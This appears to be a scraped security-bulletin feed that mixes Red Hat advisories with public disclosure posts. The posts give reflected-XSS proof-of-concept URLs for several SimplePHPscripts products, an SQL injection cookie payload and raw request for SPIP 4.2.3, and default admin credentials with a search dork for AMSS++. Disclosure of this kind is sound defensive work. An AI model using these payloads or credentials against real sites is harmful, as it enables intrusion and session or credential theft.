Photo Gallery version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/photo-gallery-php/                            ││  Vendor   : SimplePHPscripts                                                           ││  Software : Photo Gallery 2.0                                                          ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/fm7sk"><script>alert(1)</script>xfvd1?cat_id=5[-] Done

Photo Gallery 2.0 Cross Site Scripting

Red Hat Security Advisory 2023-3884-01 - Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. This release of Red Hat Single Sign-On 7.6.4 on RHEL 8 serves as a replacement for Red Hat Single Sign-On 7.6.3, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.4 security update on RHEL 8  
Advisory ID:       RHSA-2023:3884-01  
Product:           Red Hat Single Sign-On  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3884  
Issue date:        2023-06-27  
CVE Names:         CVE-2022-4361 CVE-2023-1108 CVE-2023-1664   
                   CVE-2023-2422 CVE-2023-2585   
=====================================================================

1. Summary:

New Red Hat Single Sign-On 7.6.4 packages are now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Single Sign-On 7.6 for RHEL 8 - noarch

3. Description:

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak  
project, that provides authentication and standards-based single sign-on  
capabilities for web and mobile applications.

This release of Red Hat Single Sign-On 7.6.4 on RHEL 8 serves as a  
replacement for Red Hat Single Sign-On 7.6.3, and includes bug fixes and  
enhancements, which are documented in the Release Notes document linked to  
in the References.

Security Fix(es):

* keycloak: Cross-site scripting when validating URI-schemes on SAML and  
OIDC (CVE-2022-4361)

* undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* keycloak: oauth client impersonation (CVE-2023-2422)

* keycloak: Untrusted Certificate Validation (CVE-2023-1664)

* keycloak: client access via device auth request spoof (CVE-2023-2585)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2151618 - CVE-2022-4361 Keycloak | RHSSO: XSS due to lax URI scheme validation  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close  
2182196 - CVE-2023-1664 keycloak: Untrusted Certificate Validation  
2191668 - CVE-2023-2422 keycloak: oauth client impersonation  
2196335 - CVE-2023-2585 keycloak: client access via device auth request spoof

6. Package List:

Red Hat Single Sign-On 7.6 for RHEL 8:

Source:  
rh-sso7-keycloak-18.0.8-1.redhat_00001.1.el8sso.src.rpm

noarch:  
rh-sso7-keycloak-18.0.8-1.redhat_00001.1.el8sso.noarch.rpm  
rh-sso7-keycloak-server-18.0.8-1.redhat_00001.1.el8sso.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4361  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/cve/CVE-2023-1664  
https://access.redhat.com/security/cve/CVE-2023-2422  
https://access.redhat.com/security/cve/CVE-2023-2585  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/articles/11258

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJtZlNzjgjWX9erEAQjREg//bQ9gzgcf8wRQO8sgXdavRpQL6cW6Qe+y  
lmH/vXaxwJsyZljszoNx5QZu2sCkRAoVFI6T2eATL6Ex+nG3HWrlaAeXgKNfREJu  
St6VGGYF2JMELAWHRwbARDxFJB1Yl+Fiyl2vLafjTqLgY821hfUBB0jrXFDM204K  
bhd9JhOyxu4yYcg2j13MjPkWxOZ1Rk5gNUkPDwTidPe2Txvy4f9tg6La/Gg+2BqT  
P+3ADTU58U21SHA1u4zYxZ1zgY0frXsqH9lE6ojUS+oRWQhkzgx9ULAlY3Azt9dh  
MpI3obop3SyUyEEnFMz5nt9hSnzi6i0WXExGr1IouF8XCvrlug5sWlV9vfaY5e8c  
4raWlefnUYnEjTy9pnuCKOlbunwbXHvekV1aVOdBG1T7nSiztPxK78k9ZZQDK/O4  
JDeMJ0CFeyiO1eVFrWLwqBjGxycVb3ip1tAofRA5BHvjzcRd3LVipBQGEvikSxMX  
ORlrRp8KUZPO8imouqQZhKriUvUiV/P5uxUm52P1v23CjgPKpZMVTVQwxO2o0wmE  
2bLialQkfFL0eWFrM2Ufr87XN2Rs3Z3V7rLGm+84dlTxrgfISUhCFNetZoAYRatE  
rC0HHEUh5/kLJKN7OuD/OAc9If62JNdNmkzTKiDh2dI2NRSVdsJn8LP6/sXJg6hM  
VE5JdJvVuw4=  
=2fac  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3884-01

SPIP version 4.2.3 suffers from a remote SQL injection vulnerability.

    ## Title: spip-v4.2.3 SQLi-cookie session vulnerability - Server SideSensitive information Disclosure!## Author: nu11secur1ty## Date: 06.28.2023## Vendor: https://www.spip.net/en_rubrique25.html## Software: https://files.spip.net/spip/archives/spip-v4.2.3.zip## Reference: https://portswigger.net/web-security/information-disclosure## Description:The spip_session cookie appears to be vulnerable to SQL injectionattacks. A single quote was submitted in the spip_session cookie, anda database error message was returned. Two single quotes were thensubmitted and the error message disappeared. You should review thecontents of the error message, and the application's handling of otherinput, to confirm whether a vulnerability is present.Additionally, the payload ' and '8025'='8025 were submitted in thespip_session cookie, and a database error message was returned.The attacker who has an account easily can dump almost all sensitiveinformation from the server. This is the wrong configuration of thesessions of this app and a serious bug in the backend execution -function modules of this app which bug is coming from the developmentteam of this web application! No one user account or even broadcastadmin account, must not be seeing inside information of the server,except on the layer 2 level, which must be a LOCAL ADMINISTRATOR! fromthe side of the developers of this web app.STATUS: HIGH-CRITICAL Vulnerability[+]Exploit:```GETGET /pwnedhost7/ecrire/?exec=info HTTP/1.1Host: 192.168.100.45Cookie: spip_admin=%40pwned%40pwned.com; spip_accepte_ajax=1;spip_session=1_c9209323400f315bb516fdc7c5345eaeCache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/SPIP/spip-v4.2.3)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/spip-v423-sqli-cookie-session.html)## Time spend:03:15:00

SPIP 4.2.3 SQL Injection

News Script Pro version 2.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/news-script-php-pro/                          ││  Vendor   : SimplePHPscripts                                                           ││  Software : News Script Pro is 2.4                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/mn71q"><script>alert(1)</script>p15vr?cat_id=&p=2Path: /preview.phphttps://website/preview.php?id=467&p=2&search=&SysMessage=ahw5l%3Cscript%3Ealert(1)%3C/script%3Eulvrb[-] Done

News Script Pro 2.4 Cross Site Scripting

Red Hat Security Advisory 2023-3888-01 - Red Hat Single Sign-On is an integrated sign-on solution, available as a Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat Single Sign-On for OpenShift image provides an authentication server that you can use to log in centrally, log out, and register. You can also manage user accounts for web applications, mobile applications, and RESTful web services. This erratum releases a new image for Red Hat Single Sign-On 7.6.4 for use within the OpenShift Container Platform 3.10, OpenShift Container Platform 3.11, and within the OpenShift Container Platform 4.12 cloud computing Platform-as-a-Service for on-premise or private cloud deployments, aligning with the standalone product release. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.4 for OpenShift image security enhancement update  
Advisory ID:       RHSA-2023:3888-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3888  
Issue date:        2023-06-27  
CVE Names:         CVE-2022-4361 CVE-2023-1108 CVE-2023-1664   
                   CVE-2023-2422 CVE-2023-2585 CVE-2023-24329   
=====================================================================

1. Summary:

A new image is available for Red Hat Single Sign-On 7.6.4, running on  
OpenShift Container Platform 3.10 and 3.11, and 4.12.0.

Red Hat Product Security has rated this update as having a security impact  
of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat Single Sign-On is an integrated sign-on solution, available as a  
Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat  
Single Sign-On for OpenShift image provides an authentication server that  
you can use to log in centrally, log out, and register. You can also manage  
user accounts for web applications, mobile applications, and RESTful web  
services.

This erratum releases a new image for Red Hat Single Sign-On 7.6.4 for  
use within the OpenShift Container Platform 3.10, OpenShift Container  
Platform  
3.11, and within the OpenShift Container Platform 4.12 cloud computing  
Platform-as-a-Service (PaaS) for  
on-premise or private cloud deployments, aligning with the standalone  
product release.

Security Fix(es):

* keycloak: Cross-site scripting when validating URI-schemes on SAML and  
OIDC (CVE-2022-4361)

* undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* keycloak: oauth client impersonation (CVE-2023-2422)

* keycloak: Untrusted Certificate Validation (CVE-2023-1664)

* keycloak: client access via device auth request spoof (CVE-2023-2585)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2151618 - CVE-2022-4361 Keycloak | RHSSO: XSS due to lax URI scheme validation  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close  
2182196 - CVE-2023-1664 keycloak: Untrusted Certificate Validation  
2191668 - CVE-2023-2422 keycloak: oauth client impersonation  
2196335 - CVE-2023-2585 keycloak: client access via device auth request spoof

5. References:

https://access.redhat.com/security/cve/CVE-2022-4361  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/cve/CVE-2023-1664  
https://access.redhat.com/security/cve/CVE-2023-2422  
https://access.redhat.com/security/cve/CVE-2023-2585  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJtZkdzjgjWX9erEAQhaRA/8DmtbTvYVDZA+pvd3OofvauZyJRIpVpq3  
H0rXj5M+rN/Hibf3Fy7VkJNnuCNGSUzSUi23KIr99/BqdYVJRldljkLZxPip7Sfy  
hK93NjCU8kv0cv66L3P7A6NyEP42GlV+uCd25othzoUKcCvfVxt2axmJUgqjd8I/  
tZpjurldepb+EwGSskE+C/IN1A8NYi4hGxag5w9SJZaExFESx44uxUU2pOEhXl/w  
eJm4vPsKLMfL08/tgYcSJ4gPtgFZvzVcegraY4s/hsy0yXw6WkUaxcFJuu1Mpym8  
B77RQ50Ik0c5vwMA0GJ1vTep8iJryh67QhVsPLhQ7flPT5x1r8knY7pMK7hm5onE  
bTs6M+UkQHUWs/romdOVWySCyUSVSCBA3MOsfuoSdVMb9O2Jymo/zqmOXwaoHi7y  
Xnk7nXxpFaBslXY+gwjxk44Yjilqyc7rpFLlofqsu3P2hwXXoW9DNmXu8P3lhuZf  
AUtlBTDmqhOJVIVmHe6D/Xu0iqdMUEjEwCRRo4SdxyB8rhxUOqmX+FFbNBUH7+JA  
d+UXGN+BDTyJLal7+nfx9UUDV318AkKl0CFQnNfryxCBWcBUIXLNsg2UAoZw4D9m  
JhcsXWhjobc45cJFgTo40gY/AIHpgGvwf+LupJSu8Xp6PSwFBqreYJe6KrbzfOWi  
Ch6VobSaZU0=  
=PudN  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3888-01

Funeral Script version 3.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/funeral-script-php/                           ││  Vendor   : SimplePHPscripts                                                           ││  Software : Funeral Script 3.1                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/a8udq"><script>alert(1)</script>zl141?id=11&p=&search=&SysMessage=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=&search=&SysMessage=phl3z%3cscript%3ealert(1)%3c%2fscript%3ea504dPath: /preview.phpGET 'p' parameter is vulnerable to RXSShttps://website/preview.php?id=11&p=y26tx%22%3e%3cscript%3ealert(1)%3c%2fscript%3ellgzs&search=&SysMessage=[-] Done

Funeral Script 3.1 Cross Site Scripting

Red Hat Security Advisory 2023-3883-02 - Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. This release of Red Hat Single Sign-On 7.6.4 on RHEL 7 serves as a replacement for Red Hat Single Sign-On 7.6.3, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Single Sign-On 7.6.4 security update on RHEL 7  
Advisory ID:       RHSA-2023:3883-02  
Product:           Red Hat Single Sign-On  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3883  
Issue date:        2023-06-27  
CVE Names:         CVE-2022-4361 CVE-2023-1108 CVE-2023-1664   
                   CVE-2023-2422 CVE-2023-2585   
=====================================================================

1. Summary:

New Red Hat Single Sign-On 7.6.4 packages are now available for Red Hat  
Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Single Sign-On 7.6 for RHEL 7 Server - noarch

3. Description:

Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak  
project, that provides authentication and standards-based single sign-on  
capabilities for web and mobile applications.

This release of Red Hat Single Sign-On 7.6.4 on RHEL 7 serves as a  
replacement for Red Hat Single Sign-On 7.6.3, and includes bug fixes and  
enhancements, which are documented in the Release Notes document linked to  
in the References.

Security Fix(es):

* keycloak: Cross-site scripting when validating URI-schemes on SAML and  
OIDC (CVE-2022-4361)

* undertow: Infinite loop in SslConduit during close (CVE-2023-1108)

* keycloak: oauth client impersonation (CVE-2023-2422)

* keycloak: Untrusted Certificate Validation (CVE-2023-1664)

* keycloak: client access via device auth request spoof (CVE-2023-2585)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2151618 - CVE-2022-4361 Keycloak | RHSSO: XSS due to lax URI scheme validation  
2174246 - CVE-2023-1108 Undertow: Infinite loop in SslConduit during close  
2182196 - CVE-2023-1664 keycloak: Untrusted Certificate Validation  
2191668 - CVE-2023-2422 keycloak: oauth client impersonation  
2196335 - CVE-2023-2585 keycloak: client access via device auth request spoof

6. Package List:

Red Hat Single Sign-On 7.6 for RHEL 7 Server:

Source:  
rh-sso7-keycloak-18.0.8-1.redhat_00001.1.el7sso.src.rpm

noarch:  
rh-sso7-keycloak-18.0.8-1.redhat_00001.1.el7sso.noarch.rpm  
rh-sso7-keycloak-server-18.0.8-1.redhat_00001.1.el7sso.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4361  
https://access.redhat.com/security/cve/CVE-2023-1108  
https://access.redhat.com/security/cve/CVE-2023-1664  
https://access.redhat.com/security/cve/CVE-2023-2422  
https://access.redhat.com/security/cve/CVE-2023-2585  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/articles/11258

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJtZidzjgjWX9erEAQhKwxAAju3KvMZjXnOMogh5qKqDvE5IIxGhG69b  
6czrGpf+ZwrOhSs7ErLACfDY7eMh5BbQiZaDL/Rcux6aQnErGyflu5KsaDYab99p  
6+L2jtubT+y64/23g/p0At3b1CwskVQF4ZI8q/X3BbrPDyaEl57S+2XCtSdujdTu  
WgTkVU5tjEoLfamIpN2eX83rZT9mbG8d8Y/qw41rPMBFdT6Qd7FRkeeLzjBq6/pV  
HxwSfC1KzyzJdAbd3AAI7ssiK5JZ+O3P4g5qqtyk7vG7xQ5AUN2amLcXDsVRFf6a  
4L9Zv+JwKSOFwHLiqwGcHQ75V7aRfvX4K8tST2MyUNfh81H/K/AYLtIooZ8+8Dcb  
YY9+PQwr0BzYojPlWt3AV0tjhH1MIQEw32LHA+4CZED8Q5/JlPkXVA5ISyZG3CS3  
pStzqtX0brEhmZUhAddssnihgkdjWCVLbi8dy/8Wz1LR6UFniRWp0WZ7GiGcf1oV  
4xqCPxBcoHw+MafBAiSg7RvVDpyF2HIQ/NCIa8yN2jnCVoJ61W61W3T1Sbh9oZYP  
eGZCt4VtA6/TUvKZuicbdHgQc76sHWvVbkQSEsVMrVKvBJRYpI0cRcjQpmErodRO  
NHbFE6ZYjTHBRW81Gskd2X183YrXxid0nfNeLkJ4NQkBkdAvnpzJe0MQJFFDgh5R  
nr9Iw00gWwA=  
=NfGZ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3883-02

FAQ Script version 2.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://simplephpscripts.com/faq-script-php/                               ││  Vendor   : SimplePHPscripts                                                           ││  Software : FAQ Script 2.3                                                             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttps://website/preview.php/hov24"><script>alert(1)</script>mcpji?act=faq&cat_id=1&search=Path: /preview.phpGET 'SysMessage' parameter is vulnerable to RXSShttps://website/preview.php?act=new&SysMessage=c513c%3cscript%3ealert(1)%3c%2fscript%3eujbsi[-] Done

FAQ Script 2.3 Cross Site Scripting

Red Hat Security Advisory 2023-3814-01 - Migration Toolkit for Runtimes 1.1.1 ZIP artifacts. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Migration Toolkit for Runtimes security update  
Advisory ID:       RHSA-2023:3814-01  
Product:           Migration Toolkit for Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3814  
Issue date:        2023-06-27  
CVE Names:         CVE-2023-2798 CVE-2023-22899   
=====================================================================

1. Summary:

An update is now available for Migration Toolkit for Runtimes.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Migration Toolkit for Runtimes 1.1.1 ZIP artifacts

Security Fix(es):

* htmlUnit: Stack overflow crash causes Denial of Service (DoS)  
(CVE-2023-2798)

* zip4j: does not always check the MAC when decrypting a ZIP archive  
(CVE-2023-22899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2185278 - CVE-2023-22899 zip4j: does not always check the MAC when decrypting a ZIP archive  
2210366 - CVE-2023-2798 htmlUnit: Stack overflow crash causes Denial of Service (DoS)

5. References:

https://access.redhat.com/security/cve/CVE-2023-2798  
https://access.redhat.com/security/cve/CVE-2023-22899  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=migration.toolkit.runtimes&downloadType=distributions

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJsFtdzjgjWX9erEAQjoDQ/8DerK2ZpDQzd5Q+gZ6zP1DfEwEABT5jlD  
c6j89Cj0/jOfr3OCWC4pAyqNtSgfDxtNraND3HASPoewamK4fAL9aS0NC+Nq9U7s  
0Iz0IHymbtJGRRnyhzn47LrTWQ2TFX0nYae22LO+6Qk6agtqZvTrSSQMNyKdkNlC  
dg6kuMHO8tSxjqgKe7XZERXELJeBk2MuLrPdCBPCIhTrXnmPUEYNiSUEvKrZhl2i  
slAclvJ6NYVmO0zkI8guTOOGh2m+RDCghxH5mYdX5eUgkwQdUHLn15nYfK/DXvt0  
WJqfeUKbrSUy59FXr31HexXJ2GpB3YkMU/W8JyUIolOOa4XKhOv24FaZhsvREGjM  
p9qG5uH0iSIgIPNly98wwSOtwdVdPJvPCuPM60tc/w9brfZWOcT/vbR8x9J54q1a  
7SqEpP2a4aESDqoiX57l/zcOL80fNpfuoi1TKYHefO1wICIIc85BwpFOl8LM2r9C  
JkEU9p5EuEhW2UNd1oPRwXhldXWKIdHdTt2Rwa84DkrorwcazOWhrk1CX/9ZEU2S  
fj/bxN7+pR9wDQSEKrAfVneXjbHEHIVXQ4W6XV1wrBHP3fWPwEpK2j8Jjn3sKzGI  
BwZ4RwpanaUXskhJWSrSywv+Yrm6DojrK/4bLcVCiASFuWbYRf4HVzrSq15vpnea  
prJQFb8bWRs=  
=uXt0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3814-01

AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * 